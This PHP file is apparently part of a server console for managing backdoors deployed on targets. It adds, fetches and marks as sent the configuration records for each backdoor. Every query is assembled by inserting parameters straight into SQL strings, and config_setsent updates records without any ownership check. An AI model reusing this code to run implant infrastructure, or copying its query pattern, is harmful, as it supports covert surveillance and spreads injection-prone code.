<?php

//////////
///
///   config.inc.php
///
//////////

require_once('lib/commons.inc.php');



/*************\
*   METHODS   *
\*************/

$dm['config.add']     = array('func'   => 'config_add',
                              'perm'   => AL_TECH,
                              'escape' => true);

$dm['config.get']     = array('func'   => 'config_get',
                              'perm'   => AL_SERV | AL_TECH,
                              'escape' => true);

$dm['config.setsent'] = array('func'   => 'config_setsent',
                              'perm'   => AL_SERV,
                              'escape' => true);



/***************\
*   FUNCTIONS   *
\***************/

function config_add($backdoor_id, $content)
{
   if(!in_array($backdoor_id, $_SESSION['authbackdoorid'])) {
      return error('config', 'nosuchbackdoor');
   }

   $sql  = "SELECT `activity`.`activity_id` AS `activity_id`, ";
   $sql .=        "`activity`.`status` AS `status`, ";
   $sql .=        "`target`.`target_id` AS `target_id` ";
   $sql .= "FROM `activity` ";
   $sql .= "JOIN `target` ";
   $sql .= "USING (`activity_id`) ";
   $sql .= "JOIN `backdoor` ";
   $sql .= "USING (`target_id`) ";
   $sql .= "WHERE `backdoor_id` = '$backdoor_id'";

   $ret = db_query($sql);

   if(!is_success($ret)) {
      return $ret;
   } else if($ret['payload'] === false) {
      return error('config', 'nosuchbackdoor');
   }

   if($ret['payload'][0]->status == 'CLOSED') {
      return error('config', 'noperm');
   }

   $activity_id = $ret['payload'][0]->activity_id;
   $target_id = $ret['payload'][0]->target_id;

   $sql  = "SELECT `instance` ";
   $sql .= "FROM `backdoor` ";
   $sql .= "WHERE `backdoor_id` = '$backdoor_id' ";
   $sql .= "LIMIT 1";

   $ret = db_query($sql);

   if(!is_success($ret)) {
      return $ret;
   }

   if($ret['payload'][0]->instance === '') {
      $sql  = "UPDATE `config` ";
      $sql .= "SET `obsolete` = '1' ";
      $sql .= "WHERE `backdoor_id` = '$backdoor_id'";

      $ret = db_query($sql);

      if(!is_success($ret)) {
         return $ret;
      }
   }

   $sql  = "INSERT INTO `config` (`backdoor_id`, ";
   $sql .=                       "`content`) ";
   $sql .= "VALUES ('$backdoor_id', ";
   $sql .=         "'".$content->scalar."')";

   $ret = db_query($sql);

   if(!is_success($ret)) {
      return $ret;
   }

   $sql = "SELECT LAST_INSERT_ID() AS `config_id`";

   $ret = db_query($sql);

   if(!is_success($ret)) {
      return $ret;
   }

   trace('config.add', "config_id={$ret['payload'][0]->config_id}", 0, 0, $activity_id, $target_id, $backdoor_id);

   return success((integer)$ret['payload'][0]->config_id);
}

function config_get($backdoor_id)
{
   if(!($_SESSION['authlevel'] & AL_SERV) && !in_array($backdoor_id, $_SESSION['authbackdoorid'])) {
      return error('config', 'nosuchbackdoor');
   }

   $sql  = "SELECT `config_id`, ";
   $sql .=        "`sent`, ";
   $sql .=        "`content` ";
   $sql .= "FROM `config` ";
   $sql .= "WHERE `backdoor_id` = '$backdoor_id'";
   $sql .= "ORDER BY `config_id` DESC ";
   $sql .= "LIMIT 1";

   $ret = db_query($sql);

   if(!is_success($ret)) {
      return $ret;
   } else if($ret['payload'] === false) {
      return error('config', 'nosuchconfig');
   }

   return success($ret['payload'][0]);
}

function config_setsent($config_id)
{
   $sql  = "UPDATE `config` ";
   $sql .= "SET `sent` = UTC_TIMESTAMP() ";
   $sql .= "WHERE `config_id` = '$config_id'";

   return db_query($sql);
}

?>
